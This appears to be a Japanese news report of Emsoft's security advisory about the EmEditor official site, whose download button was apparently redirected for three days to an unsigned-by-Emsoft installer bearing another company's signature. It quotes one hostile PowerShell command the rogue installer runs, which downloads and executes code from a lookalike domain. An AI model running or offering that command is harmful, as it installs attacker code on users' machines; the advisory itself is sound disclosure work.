株式会社エムソフトは12月23日、EmEditor 公式サイトにおけるダウンロード導線に関するセキュリティインシデントについて発表した。
これはEmEditor 公式サイトの「今すぐダウンロード」ボタンで第三者からの改変が疑われる事象を確認したというもので、2025年12月20日午前11時39分から12月23日午前5時50分に当該ボタンからダウンロードされたインストーラーについて、同社のデジタル署名が付与されていない別ファイルがダウンロードされた可能性があるという。
同社によると、ホームページの「今すぐダウンロード」ボタンのリンク先は通常、リダイレクト(転送)設定になっているが、当該期間中、リダイレクト設定が第三者により改変された疑いがあり、本来とは異なるURLからファイルがダウンロードされる状態となっていた。
当該ファイルは同社が作成したものではなく、現在は削除済みとなっている。また、当該ファイルには同社の署名ではなく、「WALSHAM INVESTMENTS LIMITED」という別組織のデジタル署名が付与されていることを確認している。
同社によると、問題となる可能性のあるインストーラーは、実行時に下記のコマンドを実行しようとするが、危険なので、このコマンドを実行しないよう呼びかけている。
powershell.exe "irm emeditorjp.com | iex"
同社では今後、原因究明と再発防止に向けて必要な対策を講じるとのこと。
